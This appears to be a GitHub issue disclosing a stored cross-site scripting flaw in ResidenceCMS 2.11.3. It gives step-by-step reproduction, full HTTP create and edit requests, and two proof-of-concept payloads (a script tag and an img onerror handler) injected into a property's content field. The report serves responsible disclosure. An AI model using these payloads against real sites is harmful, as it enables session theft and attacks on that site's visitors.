Stored XSS in ResidenceCMS 2.11.3 #151
Description
At the time of testing, there was a stored XSS vulnerability in ResidenceCMS version 2.11.3. I am raising as a seperate issue to the previous stored XSS vulnerability as that was dependent on the WYSIWYG content editor being enabled whereas this particular issue can be performed by anyone with a user account and permission to edit properties.
Note this was tested using the docker setup of ResidenceCMS and testing was done on 07/10/2025.
Steps to recreate:
-
Login as any user account that has a verified email address on the site. For the purposes of testing, the user account I used was manually verified from the administrator panel.
-
create a new property by clicking the plus icon in the bottom right of the page, an example request has been included below (due to CSRF protections the requests won't replay nicely, payloads are included near the bottom)
Create property request
POST /en/user/property/new HTTP/2
Host: localhost
Cookie: sidebar-toggled=false; PHPSESSID=hnt3k1j7oemmnmupd58oqan42k; REMEMBERME=App.Entity.User%3AeHNzdGVzdA~~%3A1762419274%3AURCTQDLza_h-WcQfXK9ysV1SpNPM1Y8ebWiI0DeEBoc~7EAd0C39Tt0vNDpiydvMMwqQOBnGzcmoqZSmzJWrRBE~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 750
Origin: https://localhost
Referer: https://localhost/en/user/property/new
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
property%5Bcity%5D=1&property%5Bdistrict%5D=&property%5Bneighborhood%5D=&property%5Bmetro_station%5D=&property%5BdealType%5D=1&property%5Bcategory%5D=1&property%5Bbathrooms_number%5D=&property%5Bbedrooms_number%5D=&property%5Bmax_guests%5D=&property%5Bproperty_description%5D%5Btitle%5D=XSSTESTPROPERTY&property%5Bproperty_description%5D%5Bmeta_title%5D=&property%5Bproperty_description%5D%5Bmeta_description%5D=&property%5Baddress%5D=55+Test+Street&property%5Blatitude%5D=&property%5Blongitude%5D=&property%5Bprice%5D=&property%5Bprice_type%5D=&property%5Bproperty_description%5D%5Bcontent%5D=TESTCONTENT&property%5B_token%5D=58af8c8592fa9b6cc2c0.E8SeAdGLHAVVP8PfADszfETxnkqni8dSp87lrX_4COA.YP2oZ6DkSUIhCJC7OQlHFDCi8HmVvIga_Yqy1CnVcZhK9-hA47xTPSB6jg
- Once the propery has been created, it is possible to use the edit functionality to add JavaScript content into the content field. For the purposes of this report, I have provided two payloads - one using script tags and one using an img tag.
Edit property request
POST /en/user/property/20/edit HTTP/2
Host: localhost
Cookie: sidebar-toggled=false; PHPSESSID=hnt3k1j7oemmnmupd58oqan42k; REMEMBERME=App.Entity.User%3AeHNzdGVzdA~~%3A1762419274%3AURCTQDLza_h-WcQfXK9ysV1SpNPM1Y8ebWiI0DeEBoc~7EAd0C39Tt0vNDpiydvMMwqQOBnGzcmoqZSmzJWrRBE~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 805
Origin: https://localhost
Referer: https://localhost/en/user/property/20/edit
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
property%5Bcity%5D=1&property%5Bdistrict%5D=&property%5Bneighborhood%5D=&property%5Bmetro_station%5D=&property%5BdealType%5D=1&property%5Bcategory%5D=1&property%5Bbathrooms_number%5D=&property%5Bbedrooms_number%5D=&property%5Bmax_guests%5D=&property%5Bproperty_description%5D%5Btitle%5D=XSSTESTPROPERTY&property%5Bproperty_description%5D%5Bmeta_title%5D=&property%5Bproperty_description%5D%5Bmeta_description%5D=&property%5Baddress%5D=55+Test+Street&property%5Blatitude%5D=&property%5Blongitude%5D=&property%5Bprice%5D=&property%5Bprice_type%5D=&property%5Bproperty_description%5D%5Bcontent%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E%0D%0A%3Cimg+src%3Dx+onerror%3Dalert%282%29%3E&property%5B_token%5D=e.oHfzgZ3RAHaSFOSD3QR_UgNfbL_HfZ4feKdCTSQt9HA.007F5-y-VTHmI7fn5DYLOncMAoz1StFXIuMVNHIAjQj5RIXAr-ZPTudRqQ
URL Encoded payload:
%3Cscript%3Ealert%281%29%3C%2Fscript%3E%0D%0A%3Cimg+src%3Dx+onerror%3Dalert%282%29%3E
Non URL Encoded:
<script>alert(1)</script>
<img src=x onerror=alert(2)>
Accesing the property page after editing triggers the XSS payloads:
Payload 1 triggering:
Payload 2 triggering:
